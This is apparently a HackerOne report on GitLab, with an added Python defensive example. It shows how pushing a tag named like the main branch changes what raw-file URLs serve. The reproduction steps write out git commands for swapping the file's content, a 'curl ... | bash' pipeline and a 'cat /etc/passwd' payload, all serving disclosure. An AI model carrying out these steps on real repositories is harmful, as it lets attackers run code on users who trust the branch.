An attacker is able to alter the information in the main branch files that are obtained through https://gitlab.com/user/repo/-/raw/main/file
HackerOne report #1498354 by st4nly0n on 2022-03-03, assigned to @ankelly:
Report
Summary
Files in the main branch of a repository can only be modified by members with high privileges within the repository and cannot be directly modified by any other user.
In this context, the use case where the user is asked to execute a script by making a curl request to a file located in the main branch of a repository could have unintended consequences, for example:
curl https://gitlab.com/user/repo/-/raw/main/install.sh | bash
The fact that the file being downloaded is in the main branch of the repository generates certain confidence and security in the user, since the files in the main branch are stable.
When you download a repository with the download button, you get the latest commit or file changes; however, when you push a tag with the name of the main branch (for example, main) pointing to a particular commit, downloading the repository will obtain refs/tags/main and not refs/heads/main. This has the consequence that a developer can modify the content of a file in the main branch at https://gitlab.com/user/repo/-/raw/main/install.sh with arbitrary code that would be executed by the victim using the use case mentioned above, i.e. getting and executing code from a file using curl.
Steps to reproduce:
[PREPARATION]
1. Create a repository from gitlab.com, with main branch name main.
2. Add a member with developer permissions.
3. Clone the repository and create a hello_world.sh file with the following content:
    echo 'Hello World'
4. Push the changes to the remote.
[ATTACK] (Guest user in step 2)
5. Clone and enter the repository created in step 1:
    git clone https:...
6. Create a new branch with the name new-feature:
    git checkout -b 'new-feature'
7. Edit the content of hello_world.sh:
    echo 'cat /etc/passwd' > hello_world.sh
8. Push the new-feature branch:
    git add .
    git commit -m 'new-feature'
    git push origin HEAD
9. Create a bash variable with the hash of the last commit in the new-feature branch:
    hash=`git rev-parse HEAD`
10. Switch to the main branch:
    git checkout main
11. Create a tag with the name main pointing to the latest commit of the new-feature branch:
    git tag main $hash
12. Push the tags to the remote:
    git push origin --tags
13. Remove the new-feature branch from the remote:
    git push -d origin 'new-feature'
As a result of this behavior an attacker can manage to change the code of the files in the main branch, causing arbitrary commands to be executed if the victim uses the use case of executing code by making a request to the file url via curl.
What is the current bug behavior?
When a tag is pushed with the name of the main branch (for example, main) that points to a particular commit, refs/tags/main and not refs/heads/main will be obtained when downloading the repository.
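As an added example (not code from the report or from GitLab), the following Python models the ref lookup the report relies on and two defensive checks: an audit for branch/tag name collisions, and the policy a server-side pre-receive hook could apply to refuse creating a tag named like an existing branch. The for-each-ref output and object ids are constructed for the example.

```python
# Constructed sample of `git for-each-ref --format='%(refname) %(objectname)'`
# output for a repository where a tag named "main" was pushed alongside the
# "main" branch, as in the report above (object ids are made up).
FOR_EACH_REF_OUTPUT = """\
refs/heads/main 1111111111111111111111111111111111111111
refs/heads/release 2222222222222222222222222222222222222222
refs/tags/main 3333333333333333333333333333333333333333
refs/tags/v1.0 4444444444444444444444444444444444444444
"""
ZERO_SHA = "0" * 40  # "old" value a hook sees when a ref is being created

def parse_refs(output):
    """Map full ref name -> object id from for-each-ref output."""
    refs = {}
    for line in output.splitlines():
        if line.strip():
            name, sha = line.split()
            refs[name] = sha
    return refs

def resolve_short_ref(refs, name):
    """Resolve a name the way gitrevisions(7) does: full ref name first, then
    refs/<name>, refs/tags/<name>, and only then refs/heads/<name>."""
    for candidate in (name, f"refs/{name}", f"refs/tags/{name}", f"refs/heads/{name}"):
        if candidate in refs:
            return refs[candidate]  # a tag shadows a branch of the same name
    return None

def ambiguous_refs(refs):
    """Short names present both as a branch and as a tag (repository audit)."""
    heads = {n[len("refs/heads/"):] for n in refs if n.startswith("refs/heads/")}
    tags = {n[len("refs/tags/"):] for n in refs if n.startswith("refs/tags/")}
    return sorted(heads & tags)

def pre_receive_check(refs, refname, old_sha, new_sha):
    """Policy for one '<old> <new> <refname>' line read by a pre-receive hook:
    refuse to create a tag named like an existing branch, or vice versa."""
    if old_sha != ZERO_SHA:
        return True, ""  # update/delete of an existing ref adds no collision
    if refname.startswith("refs/tags/"):
        short, other = refname[len("refs/tags/"):], "refs/heads/"
    elif refname.startswith("refs/heads/"):
        short, other = refname[len("refs/heads/"):], "refs/tags/"
    else:
        return True, ""
    if other + short in refs:
        return False, f"{refname} would collide with existing {other + short}"
    return True, ""
```

Asking for the unambiguous name refs/heads/main always yields the branch, which is why serving raw files by short ref name is the weak spot.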
What is the expected correct behavior?
The file at https://gitlab.com/user/repo/-/raw/main/file.sh should not be modified by pushing a tag with the main branch name.
Relevant logs and/or screenshots
The proof of concept video shows the victim executing the code of a file in the main branch through curl and obtaining the expected result. After an attacker has changed the content of the file in the main branch, the victim runs the same command and gets an unexpected result.
poc.mp4
Output of checks
This bug happens on GitLab.com
Impact
An attacker is able to change the content of a main branch file by pushing a tag with the main branch name. This results in the execution of arbitrary commands by the victim using curl to execute code from a file in the main branch.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: